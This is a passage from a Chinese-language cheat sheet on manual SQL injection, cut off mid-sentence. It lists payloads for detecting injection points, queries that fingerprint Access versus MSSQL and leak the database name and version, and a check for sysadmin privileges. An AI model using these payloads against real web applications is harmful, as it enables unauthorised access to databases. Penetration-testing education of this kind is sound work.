ACCESS、MSSQL、MYSQL、ORACLE 手工注入
http://www.zerokeeper.com/web-security/manual-injection-of-access-mssql-mysql-and-oracle.html 0x01 基本常识 简单判定有无漏洞: 粗略型:提交单引号’ 逻辑型(数字型注入):and 1=1/and 1=2 逻辑型(字符型注入):'and'1'='1/'and'1'='2 逻辑型(搜索型注入):%'and 1=1 and'%'='%/%'and 1=2 and'%'='% 简单判断数据库信息: 粗略型: 加单引号’(根据服务器报错的信息来判断) 加;--(; 表示分离,– 则是注释符,; 和–MSSQL 数据库有,ACCESS 数据库没有) 逻辑型: and user>0 and (select count() from msysobjects)>0 ……(页面错误为 access 数据库) and (select count() from sysobjects)>0 ……(页面正常为 MSSQL 数据库) and db_name()>0 ……(爆数据库名) and version>0(爆 SQLServer 版本信息以及服务器操作系统的类型和版本信息) 判断 MSSQL 权限: and 0<>(Select ISSRVROLEMEMBER('sysadmin'))--(页面正常则为